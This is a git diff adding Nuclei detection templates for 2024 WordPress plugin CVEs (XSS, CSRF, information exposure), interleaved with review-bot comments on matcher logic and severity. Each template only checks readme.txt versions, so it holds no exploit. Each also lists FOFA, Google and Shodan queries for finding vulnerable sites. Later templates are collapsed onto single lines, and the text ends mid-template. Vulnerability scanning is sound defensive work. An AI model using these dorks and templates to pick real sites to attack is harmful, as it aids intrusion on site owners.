+    Plexx Elementor Extension <= 1.3.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    The Plexx Elementor Extension plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/147bada2-036d-4e35-9ba2-59ad382afeb9?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-49234
+  metadata:
+    fofa-query: "wp-content/plugins/plexx-elementor-extension/"
+    google-query: inurl:"/wp-content/plugins/plexx-elementor-extension/"
+    shodan-query: 'vuln:CVE-2024-49234'
+  tags: cve,wordpress,wp-plugin,plexx-elementor-extension,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/plexx-elementor-extension/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "plexx-elementor-extension"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.3.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-49263-7552f0828dc77994e8b6111bcc07c62e.yaml b/poc/cve/CVE-2024-49263-7552f0828dc77994e8b6111bcc07c62e.yaml
new file mode 100644
index 0000000000..09c941f041
--- /dev/null
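Review bot: The word matcher requires the literal directory slug `plexx-elementor-extension` to appear in the readme body, but a WordPress `readme.txt` carries the display name in its `=== ... ===` header and is under no obligation to contain the slug; if it does not, the `and` condition never holds and the template is silently dead for every target. I cannot see the plugin's readme from here, so this needs checking against a real copy before the template is trusted. A presence marker the version regex already relies on is the safer choice, e.g. `- "Stable tag:"` with `case-insensitive: true`, since a 200 from a catch-all page reached through the three allowed redirects will not contain it either.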
+++ b/poc/cve/CVE-2024-49263-7552f0828dc77994e8b6111bcc07c62e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-49263-7552f0828dc77994e8b6111bcc07c62e
+
+info:
+  name: >
+    My Favorites <= 1.4.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    The My Favorites plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/103e7658-78d6-414d-ad68-e9adf77f1c60?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-49263
+  metadata:
+    fofa-query: "wp-content/plugins/my-favorites/"
+    google-query: inurl:"/wp-content/plugins/my-favorites/"
+    shodan-query: 'vuln:CVE-2024-49263'
+  tags: cve,wordpress,wp-plugin,my-favorites,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/my-favorites/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "my-favorites"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.4.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-49264-bce9a4493c3e0acb08816861aa7e69a0.yaml b/poc/cve/CVE-2024-49264-bce9a4493c3e0acb08816861aa7e69a0.yaml
new file mode 100644
index 0000000000..a4bb740616
--- /dev/null
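Review bot: The `compare_versions(version, '<= 1.4.1')` matcher depends on the internal extractor having populated `version`, and `Stable tag: ([0-9.]+)` will not match a readme whose Stable tag is `trunk`, which wordpress.org accepts. In that case `version` is unset and, as far as I can tell from the DSL, the matcher evaluates false, so the template fails closed and such installs are never reported; that is the safe direction, but it is undocumented and looks like an oversight to the next reader. A comment above the dsl matcher would settle it: `# a readme with "Stable tag: trunk" yields no version; the dsl then fails and nothing is reported (intentional)`. If those installs should be surfaced instead, that needs a separate non-version matcher rather than a looser regex.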
+++ b/poc/cve/CVE-2024-49264-bce9a4493c3e0acb08816861aa7e69a0.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-49264-bce9a4493c3e0acb08816861aa7e69a0
+
+info:
+  name: >
+    Events Addon for Elementor <= 2.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    The Events Addon for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/b5c600b4-10d6-4b0b-9ca0-7c629d383d33?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-49264
+  metadata:
+    fofa-query: "wp-content/plugins/events-addon-for-elementor/"
+    google-query: inurl:"/wp-content/plugins/events-addon-for-elementor/"
+    shodan-query: 'vuln:CVE-2024-49264'
+  tags: cve,wordpress,wp-plugin,events-addon-for-elementor,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/events-addon-for-elementor/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "events-addon-for-elementor"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 2.2.0')
\ No newline at end of file
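Review bot: `severity: low` (mirrored by the trailing `low` tag) is below the CVSS 6.4 this template records in its own `classification` block, and every sibling template in this commit carries the same mismatch, so whatever the policy is it should be stated rather than left to look like a generator default. A contributor-level stored XSS with scope change is normally filed as medium; either set `severity: medium` and the tag to `medium`, or keep `low` and explain it next to the field, e.g. `# severity deliberately lowered: readme-based version fingerprint, not a confirmed exploit`.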
diff --git a/poc/cve/CVE-2024-49306-0bb0318ccc4bea732c4bdca26fccb3c9.yaml b/poc/cve/CVE-2024-49306-0bb0318ccc4bea732c4bdca26fccb3c9.yaml
new file mode 100644
index 0000000000..17045f8808
--- /dev/null
+++ b/poc/cve/CVE-2024-49306-0bb0318ccc4bea732c4bdca26fccb3c9.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-49306-0bb0318ccc4bea732c4bdca26fccb3c9
+
+info:
+  name: >
+    WP Content Copy Protection & No Right Click <= 3.5.9 - Cross-Site Request Forgery
+  author: topscoder
+  severity: medium
+  description: >
+    The WP Content Copy Protection & No Right Click plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.5.9. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f9f273ed-2ffd-4632-9886-244c0d55ede5?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2024-49306
+  metadata:
+    fofa-query: "wp-content/plugins/wp-content-copy-protector/"
+    google-query: inurl:"/wp-content/plugins/wp-content-copy-protector/"
+    shodan-query: 'vuln:CVE-2024-49306'
+  tags: cve,wordpress,wp-plugin,wp-content-copy-protector,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wp-content-copy-protector/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "wp-content-copy-protector"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 3.5.9')
\ No newline at end of file
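Review bot: `readme.txt` under `wp-content/plugins/` is served as a static file whether or not the plugin is activated, so a match here shows the files are present, not that the handler with the missing nonce check is reachable; the description should say so, since a CSRF finding on an inactive plugin is noise for whoever triages it. I would add to `description`: `Version-based detection via readme.txt; the plugin may be installed but deactivated, in which case the affected action is not reachable.` The description also says nonce validation is missing `on a function` without naming it — if the referenced advisory identifies the handler it should be copied in, otherwise the sentence should state that the function is unspecified.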
diff --git a/poc/cve/CVE-2024-49310-c0e73cd772d251a739b2435edee2bd31.yaml b/poc/cve/CVE-2024-49310-c0e73cd772d251a739b2435edee2bd31.yaml
new file mode 100644
index 0000000000..bc3196f328
--- /dev/null
+++ b/poc/cve/CVE-2024-49310-c0e73cd772d251a739b2435edee2bd31.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-49310-c0e73cd772d251a739b2435edee2bd31 + +info: + name: > + Themesflat Addons For Elementor <= 2.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/835aaf5e-08c8-4bf8-add7-82a1f1fdc2c0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-49310 + metadata: + fofa-query: "wp-content/plugins/themesflat-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/themesflat-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-49310' + tags: cve,wordpress,wp-plugin,themesflat-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/themesflat-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "themesflat-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-8515-4fab457421fd53fdaacbeb1402844959.yaml b/poc/cve/CVE-2024-8515-4fab457421fd53fdaacbeb1402844959.yaml new file mode 100644 index 0000000000..d7a88b4236 --- /dev/null +++ b/poc/cve/CVE-2024-8515-4fab457421fd53fdaacbeb1402844959.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8515-4fab457421fd53fdaacbeb1402844959 + +info: + name: > + Themesflat Addons For Elementor <= 2.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets like 'TF E Slider Widget', 'TF Video Widget', 'TF Team Widget' and more in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on URL attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1603c61b-11a3-41e5-b339-a9411b02f383?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8515 + metadata: + fofa-query: "wp-content/plugins/themesflat-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/themesflat-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-8515' + tags: cve,wordpress,wp-plugin,themesflat-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/themesflat-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "themesflat-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-8516-8fbfc934c79036dfbd5a416f6fefcf7e.yaml b/poc/cve/CVE-2024-8516-8fbfc934c79036dfbd5a416f6fefcf7e.yaml new file mode 100644 index 0000000000..f7cb69b4af --- /dev/null +++ b/poc/cve/CVE-2024-8516-8fbfc934c79036dfbd5a416f6fefcf7e.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8516-8fbfc934c79036dfbd5a416f6fefcf7e + +info: + name: > + Themesflat Addons For Elementor <= 2.2.1 - Authenticated (Contributor+) Information Exposure + author: topscoder + severity: low + description: > + The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.1 via the render() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract limited post information from draft and future scheduled posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/75c5d4e6-9ef3-4b12-9ee9-67121dbb0fcd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8516 + metadata: + fofa-query: "wp-content/plugins/themesflat-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/themesflat-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-8516' + tags: cve,wordpress,wp-plugin,themesflat-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/themesflat-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "themesflat-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8852-5434e9f4c6616aa0da6a6e79ca2414d1.yaml b/poc/cve/CVE-2024-8852-5434e9f4c6616aa0da6a6e79ca2414d1.yaml new file mode 100644 index 0000000000..6b98a650c3 --- /dev/null 
+++ b/poc/cve/CVE-2024-8852-5434e9f4c6616aa0da6a6e79ca2414d1.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8852-5434e9f4c6616aa0da6a6e79ca2414d1 + +info: + name: > + All-in-One WP Migration and Backup <= 7.86 - Unauthenticated Information Disclosure via Error Logs + author: topscoder + severity: medium + description: > + The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.86 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information such as full paths contained in the exposed log files. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c4901d9d-7b37-40d5-a42b-59c80bbbe8ff?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-8852 + metadata: + fofa-query: "wp-content/plugins/all-in-one-wp-migration/" + google-query: inurl:"/wp-content/plugins/all-in-one-wp-migration/" + shodan-query: 'vuln:CVE-2024-8852' + tags: cve,wordpress,wp-plugin,all-in-one-wp-migration,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "all-in-one-wp-migration" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.86') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml b/poc/cve/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml new file mode 100644 index 0000000000..d6d9e2d977 
--- /dev/null +++ b/poc/cve/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9231-db808094493fa9c79c27a8695747553b + +info: + name: > + WP-Members Membership Plugin <= 3.4.9.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP-Members Membership Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.4.9.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2d59e599-59da-4c03-b71f-d00a078b2442?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9231 + metadata: + fofa-query: "wp-content/plugins/wp-members/" + google-query: inurl:"/wp-content/plugins/wp-members/" + shodan-query: 'vuln:CVE-2024-9231' + tags: cve,wordpress,wp-plugin,wp-members,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-members/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-members" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.4.9.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9541-720c3bbef5faf4e37833433865e32bd5.yaml b/poc/cve/CVE-2024-9541-720c3bbef5faf4e37833433865e32bd5.yaml new file mode 100644 index 0000000000..7fb30697c4 
--- /dev/null +++ b/poc/cve/CVE-2024-9541-720c3bbef5faf4e37833433865e32bd5.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9541-720c3bbef5faf4e37833433865e32bd5 + +info: + name: > + News Kit Elementor Addons <= 1.2.1 - Authenticated (Contributor+) Sensitive Information Exposure via Canvas Menu Elementor Template + author: topscoder + severity: low + description: > + The News Kit Elementor Addons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.1 via the render function in includes/widgets/canvas-menu/canvas-menu.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ffc5408c-ca31-4cb6-8cb5-063acbbad01e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-9541 + metadata: + fofa-query: "wp-content/plugins/news-kit-elementor-addons/" + google-query: inurl:"/wp-content/plugins/news-kit-elementor-addons/" + shodan-query: 'vuln:CVE-2024-9541' + tags: cve,wordpress,wp-plugin,news-kit-elementor-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/news-kit-elementor-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "news-kit-elementor-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9588-85ec1c6254ec8125746585f3ac5317bc.yaml b/poc/cve/CVE-2024-9588-85ec1c6254ec8125746585f3ac5317bc.yaml new file mode 100644 index 0000000000..8b5a4a85aa --- /dev/null +++ b/poc/cve/CVE-2024-9588-85ec1c6254ec8125746585f3ac5317bc.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9588-85ec1c6254ec8125746585f3ac5317bc + +info: + name: > + Category and Taxonomy Meta Fields <= 1.0.0 - Cross-Site Request Forgery to Taxonomy Meta Add/Delete + author: topscoder + severity: medium + description: > + The Category and Taxonomy Meta Fields plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on the 'wpaft_option_page' function. This makes it possible for unauthenticated attackers to add and delete taxonomy meta, granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2dc9c744-6ffb-4d7a-94ce-ba576d7b6d47?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L + cvss-score: 5.4 + cve-id: CVE-2024-9588 + metadata: + fofa-query: "wp-content/plugins/wp-custom-taxonomy-meta/" + google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-meta/" + shodan-query: 'vuln:CVE-2024-9588' + tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-meta,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-meta/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-custom-taxonomy-meta" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9589-f895fb648dc6ecd1d8cb0e28c34a5040.yaml b/poc/cve/CVE-2024-9589-f895fb648dc6ecd1d8cb0e28c34a5040.yaml new file mode 100644 index 0000000000..0ef5480d2d --- /dev/null +++ b/poc/cve/CVE-2024-9589-f895fb648dc6ecd1d8cb0e28c34a5040.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9589-f895fb648dc6ecd1d8cb0e28c34a5040 + +info: + name: > + Category and Taxonomy Meta Fields <= 1.0.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Category and Taxonomy Meta Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'new_meta_name' parameter in the 'wpaft_option_page' function in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with administrator-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9d879fc6-97ec-4ecb-99c8-7fc0b91692ef?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 5.5 + cve-id: CVE-2024-9589 + metadata: + fofa-query: "wp-content/plugins/wp-custom-taxonomy-meta/" + google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-meta/" + shodan-query: 'vuln:CVE-2024-9589' + tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-meta,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-meta/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-custom-taxonomy-meta" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of 
file diff --git a/poc/cve/CVE-2024-9590-d335833612c12a3934657fc9b0690fce.yaml b/poc/cve/CVE-2024-9590-d335833612c12a3934657fc9b0690fce.yaml new file mode 100644 index 0000000000..e1ce5c4427 --- /dev/null +++ b/poc/cve/CVE-2024-9590-d335833612c12a3934657fc9b0690fce.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9590-d335833612c12a3934657fc9b0690fce + +info: + name: > + Category and Taxonomy Meta Fields <= 1.0.0 - Authenticated (Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Category and Taxonomy Meta Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image meta field value in the 'wpaft_add_meta_textinput' function in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with editor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3f6d9c23-53e9-4393-beff-2f996c279ad8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 5.5 + cve-id: CVE-2024-9590 + metadata: + fofa-query: "wp-content/plugins/wp-custom-taxonomy-meta/" + google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-meta/" + shodan-query: 'vuln:CVE-2024-9590' + tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-meta,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-meta/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-custom-taxonomy-meta" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9591-26f35871fb392b482473e0ce75b175fb.yaml b/poc/cve/CVE-2024-9591-26f35871fb392b482473e0ce75b175fb.yaml new file mode 100644 index 0000000000..9d313d6b24 --- /dev/null +++ b/poc/cve/CVE-2024-9591-26f35871fb392b482473e0ce75b175fb.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9591-26f35871fb392b482473e0ce75b175fb + +info: + name: > + Category and Taxonomy Image <= 1.0.0 - Authenticated (Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Category and Taxonomy Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_category_image' parameter in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with editor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5760933b-30e6-465b-9b94-c913b21f07fd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 5.5 + cve-id: CVE-2024-9591 + metadata: + fofa-query: "wp-content/plugins/wp-custom-taxonomy-image/" + google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-image/" + shodan-query: 'vuln:CVE-2024-9591' + tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-image,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - 